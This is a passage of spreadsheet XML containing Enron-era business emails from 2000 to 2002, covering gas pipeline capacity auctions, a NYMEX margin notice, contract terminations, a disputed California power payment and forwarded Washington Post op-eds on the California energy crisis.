    <t xml:space="preserve">December		Scheduled	_x000D_
_x000D_
Saturday 01		_x000D_
West			(1069)_x000D_
San Juan		   835 _x000D_
East			  (366)_x000D_
_x000D_
Sunday   02		_x000D_
West			(1046)_x000D_
San Juan		   841_x000D_
East			  (375)_x000D_
_x000D_
Monday   03_x000D_
West			(1023)_x000D_
San Juan		   850_x000D_
East			  (357)_x000D_
_x000D_
_x000D_
Notes:  Quite Weekend </t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 09:36:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>AUCTION OF FTS AND ISS CAPACITY</t>
  </si>
  <si>
    <t>_x000D_
                      COLUMBIA GAS TRANSMISSION CORPORATION_x000D_
                        NOTICE TO ALL INTERESTED PARTIES_x000D_
                                  JUNE 06, 2001_x000D_
_x000D_
Notice ID: 2782_x000D_
5 - NO RESPONSE REQUIRED_x000D_
_x000D_
_x000D_
SUBJECT: AUCTION OF FTS AND ISS CAPACITY_x000D_
_x000D_
Columbia Gas Transmission has posted the following offers of FTS capacity._x000D_
_x000D_
Additional details of this capacity may be found in the Columbia Internet_x000D_
NAVIGATOR system under the Capacity Release Folder, Offers, Offers Summary,_x000D_
Offer Type, Capacity Auctions, under the following offer numbers:_x000D_
_x000D_
Offer      Rate        Receipt_x000D_
 No.     Schedule       Point         Delivery Point_x000D_
_x000D_
32602      FTS        Direct App      Market Area 5_x000D_
32603      FTS        Leach           Market Area 5_x000D_
_x000D_
32629      FTS        Milford         Market Area 21_x000D_
_x000D_
32604      FTS        Leach           Market Area 1_x000D_
32605      FTS        Leach           Market Area 5_x000D_
32606      FTS        Leach           Market Area 5_x000D_
32607      FTS        Crossroads      Market Area 5_x000D_
32633      FTS        Leach           Market Area 7_x000D_
32609      FTS        Leach           Market Area 8_x000D_
32610      FTS        Crossroads      Market Area 8_x000D_
32611      FTS        Leach           Market Area 8_x000D_
32612      FTS        Leach           Market Area 9_x000D_
32613      FTS        Crossroads      Market Area 9_x000D_
32614      FTS        Leach           Market Area 10_x000D_
32615      FTS        Leach           Market Area 12_x000D_
32616      FTS        Leach           Market Area 15_x000D_
32617      FTS        Leach           Market Area 19_x000D_
32618      FTS        AO4 Alexander   Market Area 32_x000D_
                          Agg._x000D_
32620      FTS        Leach           Market Area 5_x000D_
32621      FTS        Leach           Market Area 8_x000D_
32622      FTS        Leach           Market Area 9_x000D_
32623      FTS        Leach           Market Area 12_x000D_
32625      FTS        Leach           Market Area 15_x000D_
32631      FTS        Highland        Market Area 38_x000D_
32638      ISS_x000D_
_x000D_
For additional information, please contact your Account Representative or your_x000D_
Customer Services Team.</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 12:44:33 -0800 (PST)</t>
  </si>
  <si>
    <t>asset purchase from the estate?</t>
  </si>
  <si>
    <t>David,_x000D_
_x000D_
How can I buy an asset from the estate? It is a deal from FPL._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Doug</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 06:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>August Wellhead Production Estimate</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
_x000D_
Here it is.  I thought Vance had already given this to you._x000D_
_x000D_
Bob_x000D_
_x000D_
---------------------- Forwarded by Robert Cotten/HOU/ECT on 07/25/2000 01:25 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Vance L Taylor_x000D_
07/24/2000 09:43 AM_x000D_
To: Robert Cotten/HOU/ECT@ECT_x000D_
cc: Melissa Graves/HOU/ECT@ECT _x000D_
Subject: August Wellhead Production Estimate_x000D_
_x000D_
Bob,_x000D_
_x000D_
Please see the attached file estimating wellhead production for the month of _x000D_
August.  Please be advised that this is a preliminary estimate as to this _x000D_
date, we have received only a few noms for August.  I will update you with _x000D_
any revisions as they occur._x000D_
_x000D_
Thanks,_x000D_
_x000D_
vlt_x000D_
x3-6353_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 05:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>did I forget</t>
  </si>
  <si>
    <t xml:space="preserve">to mention that parking fees are $67 a day?_x000D_
_x000D_
Nancy_x000D_
(707) 251-4870 (phone)_x000D_
(707) 265-5446 (fax)_x000D_
"Plus je bois, mieux je chante"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 01:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>(01-101) ARGIN RATE CHANGE FOR CRUDE OIL, HEATING OIL, AND UNLEADED_x000D_
 GASOLINE  FUTURES CONTRACTS</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 01-101_x000D_
March 23, 2001_x000D_
_x000D_
TO:_x000D_
ALL NYMEX DIVISION MEMBERS AND MEMBER FIRMS_x000D_
ALL NYMEX DIVISION CLEARING FIRMS_x000D_
ALL NYMEX DIVISION OPERATIONS MANAGERS_x000D_
_x000D_
FROM:_x000D_
Neal Wolkoff, Executive Vice President_x000D_
_x000D_
SUBJECT:_x000D_
MARGIN RATE CHANGE FOR CRUDE OIL, HEATING OIL, AND UNLEADED GASOLINE  FUTURES _x000D_
CONTRACTS._x000D_
_x000D_
Effective Date:       Friday, March 23, 2001 (close of business)_x000D_
Futures Contracts:    Crude Oil Futures_x000D_
                      Unleaded Gasoline Futures_x000D_
                      Heating Oil Futures_x000D_
Contract Months:      All Months_x000D_
Rate Change:_x000D_
_x000D_
NYMEX Division Margins on Crude Oil, Unleaded Gasoline, and Heating Oil _x000D_
Futures Contracts_x000D_
Clearing Member (Maintenance Margin): Old:  $3,000 New:  $2,500_x000D_
Member Customer (Initial Margin): Old:  $3,300 New:  $2,750_x000D_
Non-Member Customer (Initial Margin):   Old:  $4,050 New:  $3,375_x000D_
_x000D_
The margin credit for NYMEX Light Sweet Crude/IPE Brent Crude Oil futures _x000D_
spread positions will also be decreased, from $2,500 to $2,000 (at the _x000D_
Clearing Member level), as of Thursday, March 21, 2001.  The net margin after _x000D_
the spread will remain unchanged._x000D_
_x000D_
NYMEX Light Sweet Crude/IPE Brent Crude Oil Futures Spread_x000D_
_x000D_
NYMEX Light Sweet Crude:_x000D_
Clearing Member (Maintenance Margin):   $2,500_x000D_
Member Customer (Initial Margin):  $2,750_x000D_
Non-Member Customer (Initial Margin):  $3,375_x000D_
_x000D_
Less: NYMEX Light Sweet/IPE Brent Crude Spread Credit:_x000D_
Clearing Member (Maintenance Margin):   $2,000_x000D_
Member Customer (Initial Margin):  $2,200_x000D_
Non-Member Customer (Initial Margin):  $2,700_x000D_
_x000D_
Net Spread Margin:_x000D_
Clearing Member (Maintenance Margin):   $500_x000D_
Member Customer (Initial Margin):  $550_x000D_
Non-Member Customer (Initial Margin):  $675_x000D_
_x000D_
Should you have any questions regarding these changes, please contact Arthur _x000D_
McCoy at (212) 299-2928 or Joe Sanguedolce at (212) 299-2855.  This notice _x000D_
supersedes all previous notices regarding outright margins for the NYMEX _x000D_
Crude Oil, Unleaded Gasoline, or Heating Oil Futures Contracts and the margin _x000D_
credit for the NYMEX Light Sweet Crude Oil/IPE Brent Crude Oil futures spread _x000D_
positions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=tana.jones@enron.com&amp;refdo_x000D_
c=(01-101)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 May 2000 07:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'george.mccormick@enron.com'})</t>
  </si>
  <si>
    <t>I have not had the chance to run those numbers for CIPCO.  I am trying to _x000D_
shoot for later today or early tomorrow.  Thanks_x000D_
Ben_x000D_
3-7998</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 11:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mitsubishi</t>
  </si>
  <si>
    <t>I heard a rumor that Carlos Sole has been tasked with the Mitsubishi _x000D_
consent.  I'm sure he will do a great job._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 04:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jackie.morgan@enron.com'})</t>
  </si>
  <si>
    <t>Re: Firm Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Jackie,_x000D_
_x000D_
I am forwarding you via inter-office mail the termination letters prepared by _x000D_
Kimberlee Bennick for your further handling.  I have placed the letters _x000D_
inside the contract file folders.  Please call me if you have any questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886_x000D_
----- Forwarded by Eric Gillaspie/HOU/ECT on 09/05/2000 11:15 AM -----_x000D_
_x000D_
	Eric Gillaspie_x000D_
	08/30/2000 04:00 PM_x000D_
		 _x000D_
		 To: Jackie Morgan/HOU/ECT@ECT_x000D_
		 cc: Gerald Nemec/HOU/ECT@ECT_x000D_
		 Subject: Re: Firm Contracts_x000D_
_x000D_
Jackie,_x000D_
_x000D_
Gerald has forwarded the 5 files to Kimberlee Bennick, and she is going to _x000D_
prepare termination letters for the contracts accordingly._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886_x000D_
----- Forwarded by Eric Gillaspie/HOU/ECT on 08/30/2000 03:58 PM -----_x000D_
_x000D_
	Jackie Morgan_x000D_
	08/28/2000 01:13 PM_x000D_
		 _x000D_
		 To: Mark D Thorne/HOU/ECT@ECT, Eric Gillaspie/HOU/ECT@ECT, Gerald _x000D_
Nemec/HOU/ECT@ECT_x000D_
		 cc: Cheryl Dudley/HOU/ECT@ECT, Lauri A Allen/HOU/ECT@ECT_x000D_
		 Subject: Re: Firm Contracts_x000D_
_x000D_
Mark, these are the conracts we discussed last week.  Please refer to Lauri's _x000D_
note below.  Let's forward the contract files for the first three to Eric _x000D_
Gillaspie in Legal._x000D_
Both Lauri and I will need copies of the other contracts.  Once Lauri has _x000D_
reviewed the contract copies, she will let me know how to move forward.  Any _x000D_
additional contracts that she decides to terminate, we will get those files _x000D_
to Eric as well._x000D_
_x000D_
Please direct any questions to my attention.  As usual, thanks for your _x000D_
assistance._x000D_
_x000D_
Jackie_x000D_
---------------------- Forwarded by Jackie Morgan/HOU/ECT on 08/28/2000 01:03 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Lauri A Allen_x000D_
08/28/2000 11:18 AM_x000D_
To: Jackie Morgan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Firm Contracts  _x000D_
_x000D_
Jackie-_x000D_
_x000D_
We'd like to terminate the following:_x000D_
_x000D_
BASF_x000D_
Cogen Lyondell_x000D_
Lessor, John Lamar_x000D_
_x000D_
We'd like copies of the following contracts, some to terminate and some just _x000D_
to review before they're put in the data room:_x000D_
_x000D_
Corpus Christi Gas Marketing_x000D_
Dow Pipeline Company_x000D_
Duke Energy Field Services_x000D_
Entex Gas Marketing_x000D_
EOG Resources #96015083 &amp; #96008637_x000D_
Gulf Energy Pipeline_x000D_
Reliant Energy- Entex #96006966_x000D_
Southern Union #96016993 &amp; #96006303_x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
To: Lauri A Allen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Firm Contracts  _x000D_
_x000D_
Lauri, do you/Ed want to terminate any of the contracts listed below?   If _x000D_
so, please let me know which ones and I will get the files to Legal for _x000D_
review and termination letters._x000D_
_x000D_
Thanks._x000D_
_x000D_
Jackie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lauri A Allen_x000D_
08/28/2000 10:29 AM_x000D_
To: Jackie Morgan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Firm Contracts_x000D_
_x000D_
Jackie-_x000D_
_x000D_
I have reviewed the transport contracts on the list using OSS and POPS back _x000D_
to 9/93 and come up with the following:_x000D_
_x000D_
BASF- last used 9/94, no imbalance on records_x000D_
Cogen Lyondell Inc.- last used 3/97, no imbalance on records_x000D_
Corpus Christi Gas Marketing, LP- last used 5/99, small imbalance on books_x000D_
Dow Pipeline Company- no activity found, small imbalance on records_x000D_
Duke Energy Field Services Assets, LLC- current_x000D_
Entex Gas Marketing Company- current_x000D_
EOG Resources Marketing, Inc.- #96015083 current_x000D_
EOG Resources Marketing, Inc.- #96008637 no activity found_x000D_
Gulf Energy Pipeline, LLC- last used 4/00 for some IT business, no imbalance_x000D_
Lessor, John Lamar- no activity found, no imbalance on records_x000D_
Reliant Energy- Entex- #96016993 current_x000D_
Southern Union Company- #96016993 current_x000D_
Southern Union Company- #96006303 not found, no imbalance on records_x000D_
_x000D_
_x000D_
I did not look at any of the intercompany accounts.  I left this schedule on _x000D_
Kenny's desk so that he could review the storage contracts (the -5xx _x000D_
suffixes).  He is out today, but due back tomorrow.  Please let me know if _x000D_
you need further info._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 17:07:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gerry.hrap@enron.com'})</t>
  </si>
  <si>
    <t>ABC/ANG Capacity ( your interest in firm/IT Winter 2001)</t>
  </si>
  <si>
    <t>BT;_x000D_
- I feel like foghorn leghorn on this project (ie: "I'm pitching but not one's catching")...I have been trying to find ABC/ANG capacity (per your inquiry for 10,000 capacity for winter only) in addition to looking for 5,000 of ABC only capacity for Petrobank (they actually have firm ANG/PGT but let their ABC go) _x000D_
- fyi, (this has not been press released) but it looks like NOVA/ANG will have an additional 60,000 of contracted capacity avail this Nov 1 (part of the expansion that was to go with the PGT expansion but is being done early as it only goes as far as kinsgate)...no surprise that the shipper to get the capacity is BC Gas (to use for Southern Crossing) _x000D_
- I'm afraid that the best we can offer is IT Tolls (.17 C/GJ for Nova + .08 C/GJ for ANG + .06 for Fuel on ANG) = .31 C/GJ_x000D_
- as far as ABC capacity, there are mismatches (that are complicated by higher fuel rates in the winter) but I will keep working the phones_x000D_
- do you know if any of the PNW/Calif shippers-utilities have excess ABC capacity and an interest in ANG/PGT??? (Petrobank will likely look at any term winter/1 yr/longer)_x000D_
- based on previous dealings, Petrobank is motivated _x000D_
   _x000D_
_x000D_
Thanks,_x000D_
_x000D_
GH</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 10:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dave:_x000D_
A couple things about the limit orders:_x000D_
_x000D_
1:  When a customer opens up the limit order box, I think the time open _x000D_
should default to 12 hours.  We want the orders open as long as possible.  _x000D_
Now, it is more work to keep the order open for 12 hours than for 1 hour.  _x000D_
Traditionally, limit orders are a day order, good for the entire trading _x000D_
session unless specified otherwise.  _x000D_
_x000D_
2.  Today Pete had 13,000/ day on his bid because he was hit for small size.  _x000D_
When I tried to place a limit order, the quantity had to be in 5,000 _x000D_
increments of 13,000 (i.e. 3000, 8000, 18000...).  I could not overwrite the _x000D_
quantity to be 15,000.  _x000D_
_x000D_
3.  Everytime a limit order is placed, an error message occurs on the system _x000D_
saying error trade, price not available._x000D_
_x000D_
4.  Is there a way to modify a limit order, such as changing the price, _x000D_
without canceling it and resubmitting a new one?  If not, this would be a _x000D_
valuable feature._x000D_
_x000D_
Thx,_x000D_
John</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 04:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Core/Non Core</t>
  </si>
  <si>
    <t xml:space="preserve">New Analysis per our discussion this morning.  _x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 11:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wfp_test@hotmail.com'})</t>
  </si>
  <si>
    <t>frozenset({'larry.f.campbell@enron.com'})</t>
  </si>
  <si>
    <t>Test to larry.f.campbell</t>
  </si>
  <si>
    <t>This message originated from an external e-mail account.  Please reply with_x000D_
confirmation of receipt._x000D_
_x000D_
Bill Peterson_x000D_
Enron Notes Administration_x000D_
_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com.</t>
  </si>
  <si>
    <t>Tue, 24 Jul 2001 13:33:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: California Energy Resources Scheduling - February payment they_x000D_
 dispute</t>
  </si>
  <si>
    <t>Steve,_x000D_
	Take a look at the e-mail and give me you insight. We talked about this a few months ago and never came to a solid conclusion. I just want to try and put it to bed. Thanks for your help on this matter and I hope all is going well for you._x000D_
_x000D_
							Chris_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Clemons, Amy  _x000D_
Sent:	Tuesday, July 24, 2001 1:24 PM_x000D_
To:	Stokley, Chris_x000D_
Cc:	Ratnala, Melissa K._x000D_
Subject:	California Energy Resources Scheduling - February payment they dispute_x000D_
Importance:	High_x000D_
_x000D_
Hi Chris,	_x000D_
	_x000D_
	I wanted to check on California Energy Resouces Scheduling - the piece they disputed paying us in February.  Virginia had in DMS that you are handling this now. So, to refresh your memory, they did not pay us $186,000 in February - broken down as follows:_x000D_
_x000D_
Deal #533136.1  2/1/01  800 mws on peak @ $46.50/mw = $37,200_x000D_
Deal #533136.1  2/2/01  800 mws on peak @ $46.50/mw = $37,200_x000D_
Deal #533136.1  2/3/01  800 mws on peak @ $46.50/mw = $37,200_x000D_
Deal #533136.1  2/5/01  800 mws on peak @ $46.50/mw = $37,200_x000D_
Deal #533136.1  2/6/01  800 mws on peak @ $46.50/mw = $37,200_x000D_
_x000D_
They said CDWR did not pick a block forward from the PX until 2/7/01.  So they are saying these weren't theirs until the 7th._x000D_
_x000D_
Thus my accounts receiveable shows that we have been shorted $186,000.  I need to know if I can collect this from them or if we will change the deals so that they will not be charged for the above days they are disputing.  I really need to get this fixed as soon as possible - since this shows possible exposure to us if we can't collect or DPR to the West if we have to remove these deals for the above days._x000D_
_x000D_
Let me know if you have any questions and let me know what info. you have._x000D_
_x000D_
Thanks!_x000D_
Amy</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 09:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, with a temporary change for this week only!  The Leadership call will _x000D_
take place Friday, May 18 at 4:30 PM instead of Thursday, May 17 at 4:30 PM._x000D_
_x000D_
gngr_x000D_
713-853-7751_x000D_
_x000D_
_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	05/16/2001 03:37 PM_x000D_
		 _x000D_
		 To: Ginger Dernehl/NA/Enron@Enron_x000D_
		 cc: James D Steffes/NA/Enron@Enron_x000D_
		 Subject: _x000D_
_x000D_
Apologies, but I'm trying to make sure that I have the meeting times right._x000D_
_x000D_
Monday 10:30 AM CDT--"All hands" meeting with business folks._x000D_
Monday 3 PM CDT--Washington Call_x000D_
Tuesday/Thursday 1:30 PM CDT--California Call_x000D_
Thursday 4 PM CDT--Leadership call_x000D_
_x000D_
Do I have these right?_x000D_
_x000D_
Thanks a million._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 05:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>plz call asap re: mary hain.  thanks, jeff  415.782.7822</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 01:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janel.guerrero@enron.com', 'james.steffes@enron.com', 'karen.denne@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Washington Post articles 5/16/01</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Cindy Derecskey/Corp/Enron on 05/16/2001 08:49 AM -----_x000D_
_x000D_
	Lora Sullivan_x000D_
	05/16/2001 08:33 AM_x000D_
		 _x000D_
		 To: Mark Palmer/Corp/Enron@ENRON, Cindy Derecskey/Corp/Enron@Enron_x000D_
		 cc: Lora Sullivan/Corp/Enron@ENRON_x000D_
		 Subject: Washington Post articles 5/16/01_x000D_
_x000D_
_x000D_
Per the request of Linda Robertson attached please find the following:_x000D_
_x000D_
Midterm Jitters in the House _x000D_
By David S. Broder_x000D_
_x000D_
Wednesday, May 16, 2001; Page A23 _x000D_
President Bush may not be a scholar, but he is an avid student of politics. _x000D_
For understandable reasons, he has given especially close scrutiny to the _x000D_
lessons of his father's presidency -- and what went wrong to deny him a _x000D_
second term in 1992._x000D_
The results can be seen in the current chief executive's adamant support of _x000D_
the large tax cut on which he campaigned; he knows that his dad's retreat _x000D_
from his "no new taxes" pledge cost him vital conservative support. The _x000D_
younger Bush is also the opposite of the elder in emphasizing education. Bush _x000D_
I did little or nothing to change the schools; Bush II put them at the top of _x000D_
his agenda, just as the voters persistently do._x000D_
But the most costly error -- in political terms -- that Bush I made was _x000D_
refusing to consider any short-term fixes for the economic slump that began _x000D_
in the third year of his presidency. When the jobless rate began to edge up, _x000D_
Treasury Secretary Nicholas Brady counseled Bush against any stimulus _x000D_
measures, saying that market forces would be enough by themselves to keep the _x000D_
recession short._x000D_
Brady's advice brought no comfort to the Republican politicians on Capitol _x000D_
Hill, who were picking up bad vibes from their constituents. Vice President _x000D_
Dan Quayle, who was on the GOP fundraising circuit in 1991, expressed his _x000D_
frustration that Brady was blocking even modest short-term measures. History _x000D_
has recorded that Brady was right. The recession was short, and recovery -- _x000D_
as measured by the statisticians -- actually began before the 1992 election. _x000D_
But that did not spare the incumbent president from charges of indifference _x000D_
to persisting unemployment, and Bill Clinton was elected on a promise to pep _x000D_
up the economy._x000D_
The current Bush has accepted congressional changes in his tax plan that will _x000D_
apply short-term stimulus to a sluggish economy. But on the energy problems _x000D_
that began on the West Coast and have swept across the country, Bush II is as _x000D_
scornful of short-term fixes as his father was a decade ago._x000D_
This week the administration is releasing its energy plan -- crafted by a _x000D_
task force under Vice President Dick Cheney -- in an atmosphere of growing _x000D_
crisis. Even before summer has arrived, California is experiencing rolling _x000D_
blackouts. Oregon and Washington have sacrificed the salmon runs to save _x000D_
river water for hydroelectric power. Midwest gasoline prices have surged past _x000D_
$2 a gallon. And natural gas prices are sky-high everywhere._x000D_
When I spent a weekend at Rocky Mountain College in Montana earlier this _x000D_
month, I was astonished to learn that even in that energy-exporting state, _x000D_
the first phase of deregulation has sent prices soaring and made energy the _x000D_
hottest issue._x000D_
In the face of all this, Cheney and Bush have refused to consider temporary _x000D_
price caps on electric power or any other short-term "fix" that violates _x000D_
free-market principles. The complex of production incentives and conservation _x000D_
measures that make up the energy strategy is designed to bring supply and _x000D_
demand into balance over the next several years, not to provide immediate _x000D_
relief._x000D_
That may be sound economics, but it leaves congressional Republicans as _x000D_
nervous as their counterparts were 10 years ago. Rep. Tom Davis, the able _x000D_
Virginian who heads the National Republican Congressional Committee, told me _x000D_
last week that he is hearing more worries from his colleagues about energy _x000D_
prices than about the overall economy._x000D_
"We can stand one bad summer," Davis said, "but if we're facing the same _x000D_
thing next summer, we've got problems."_x000D_
Davis said he had communicated his party's concerns to the White House. "Do _x000D_
they get the message?" I asked._x000D_
"No," he said. "They think in four-year terms; we think in two."_x000D_
That comment reflects a reality that few politicians are as candid as Davis _x000D_
in acknowledging. Much as the members of one party's congressional wing may _x000D_
hope for a president of their own party, who will sign the bills they pass _x000D_
and help them raise money for their own campaigns, owning the White House _x000D_
creates dilemmas._x000D_
The basic political strategy is always set by the president's people, and _x000D_
naturally enough, they think about creating favorable conditions for the year _x000D_
in which he will run for reelection. They can be more patient, and more _x000D_
oblivious to short-term problems, than those who are focused on the battle _x000D_
for the House and Senate._x000D_
Republicans like Tom Davis remember that eight years ago, when the Democrats _x000D_
controlled both the White House and Congress, it was Clinton's policy _x000D_
decisions on taxes, trade, guns and health care that left his party so _x000D_
vulnerable that Democrats lost both the House and Senate in 1994. That's the _x000D_
risk Republicans are facing now. And that's why they're nervous._x000D_
, 2001 The Washington Post Company _x000D_
_x000D_
*********************************************_x000D_
_x000D_
More Than California's Problem _x000D_
By Gray Davis_x000D_
_x000D_
Wednesday, May 16, 2001; Page A23 _x000D_
SACRAMENTO -- As President Bush this week rolls out his new energy policy, I _x000D_
once again urge him to confront the energy elephant in the middle of the room _x000D_
-- the out-of-control wholesale prices of electricity in California and _x000D_
across the West._x000D_
In 1996, California ventured headlong into a flawed scheme to deregulate _x000D_
electricity. Although Californians were promised lower rates and plentiful _x000D_
supply, both predictions have turned out to be disastrously wrong. We have _x000D_
now seen our first statewide rolling blackouts since World War II. Unheard-of _x000D_
wholesale prices for power have bankrupted our largest utility, threaten to _x000D_
bankrupt the second largest and have begun to seriously affect our economy. _x000D_
If we don't get the situation under control, it could quickly threaten our _x000D_
national economy._x000D_
California bears some fault for the current situation. In addition to the _x000D_
botched deregulation plan, centermost was our failure for the 12 years before _x000D_
I took office to build any major power plants. But my administration has _x000D_
moved quickly to remedy that by streamlining the permitting process for _x000D_
generating facilities. In the past two years, my energy commission has _x000D_
licensed 14 new major power plants, nine are under construction, and four _x000D_
will be on line this summer or fall. Nearly a dozen more are in the pipeline. _x000D_
In addition, we've approved six new "peaker" plants to meet this summer's _x000D_
demand. We're moving at unprecedented speed to deal with the supply problem._x000D_
The state, however, has absolutely no jurisdiction over the wholesale prices _x000D_
being charged by the unregulated, mostly out-of-state generators that _x000D_
purchased the utilities' power plants as part of deregulation. Since the _x000D_
Federal Power Act was passed in 1935, price regulation has been the exclusive _x000D_
domain of the federal government. But the Bush administration and the Federal _x000D_
Energy Regulatory Commission have consistently refused to carry out their _x000D_
statutory obligation to ensure energy prices are "just and reasonable."_x000D_
To the contrary, the free-market ideologues in the administration argue that _x000D_
uncontrolled market prices are needed in order to increase the supply of _x000D_
electricity. In other words, if we don't allow power generators to shoot the _x000D_
moon on prices, they won't have sufficient incentive to build additional _x000D_
supply. That's as ridiculous as saying we need to pay dairies $300 a gallon _x000D_
to motivate them to produce milk. In fact, I have joined my fellow governors _x000D_
in Oregon and Washington in proposing temporary cost-based pricing that would _x000D_
still allow generators and marketers a healthy profit -- but without _x000D_
bankrupting the system._x000D_
Last week, however, Vice President Dick Cheney told the Los Angeles Times _x000D_
that he would remain philosophically opposed to any federal intervention on _x000D_
wholesale power prices even if it threatened the national economy. With all _x000D_
due respect to the vice president, that is one of the most irresponsible _x000D_
statements I've ever heard. Here is the eye-popping result of the federal _x000D_
government's rigid stance: In the spring of 2000, a megawatt of electricity _x000D_
in California cost an average of $30. By last December, after the Federal _x000D_
Energy Regulatory Commission precipitously removed the hard price cap of $250 _x000D_
per megawatt hour that been in effect, the spot-market price shot up to _x000D_
$1,500 for the same megawatt of power. Just last week, we paid an astounding _x000D_
per-megawatt record of $1,900 to Houston-based Reliant Energy for the last _x000D_
100 megawatts of power we needed to keep the lights on._x000D_
The macro result of this unconscionable price gouging is predictable -- and _x000D_
scary. In 1999, California power users paid approximately $7 billion for all _x000D_
electricity consumed. Last year, that figure shot up to $27 billion. This _x000D_
year, estimates are that total spending on electrical power may hit $50 _x000D_
billion to $60 billion._x000D_
The California Independent System Operator, the state's electric grid _x000D_
manager, has estimated in a report to the federal energy commission that _x000D_
electricity overcharges during the past year have totaled more than $6 _x000D_
billion. Even the federal commission itself has formally ruled that the _x000D_
electricity market in California is dysfunctional and that prices charged _x000D_
have been unjust and unreasonable._x000D_
Where is that money going? Simply put, into the pockets of the generators and _x000D_
marketers -- almost all of them in the South and many of them located in _x000D_
Texas. It is one of the most massive transfers of wealth from the consumers _x000D_
of one state to companies located in another region of the country in our _x000D_
nation's history. But other than ordering a pittance in limited refunds -- _x000D_
none of which has yet been returned to the state -- the Federal Energy _x000D_
Regulatory Commission has stood fast in its opposition to real price caps._x000D_
The day before President Bush was sworn in, he stated on national television _x000D_
that the energy problem here was California's to solve. Well, we are moving _x000D_
aggressively to do our part to get it under control on both the generation _x000D_
and conservation fronts. But without just and reasonable prices for wholesale _x000D_
power, the crisis inevitably will spill over and damage the already-sluggish _x000D_
national economy._x000D_
That, Mr. President, not only will be your problem, it will affect every one _x000D_
of us. Californians are demanding action. We are doing our part, leading the _x000D_
nation in building power plants and in aggressive conservation. The federal _x000D_
government must do its part to temporarily control runaway energy prices in _x000D_
the West until we can bring on line the major new power plants California has _x000D_
approved._x000D_
The writer, a Democrat, is governor of California._x000D_
, 2001 The Washington Post Company </t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 04:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'mary.hain@enron.com', 'james.steffes@enron.com', 'mark.palmer@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">The article deals with the Cal ISO credit risk and the effect on power _x000D_
prices.  This is on the Enron web site.  _x000D_
Maybe we work this into the talking points response?_x000D_
_x000D_
_x000D_
       Reliant Energy: Selling Pwr To Cal ISO Could Be Risky _x000D_
       Of DOW JONES NEWSWIRES _x000D_
_x000D_
       Dec. 11, 2000 _x000D_
       Dow Jones Energy Service _x000D_
       (Copyright (c) 2000, Dow Jones &amp; Company, Inc.) _x000D_
_x000D_
       (This article was originally published Friday) By Mark Golden _x000D_
_x000D_
       LAS VEGAS (Dow Jones)--BC Hydro's concerns about the California _x000D_
Independent System Operator's credit have spread quickly this week_x000D_
       to other suppliers, forcing the grid operator to pay premium prices _x000D_
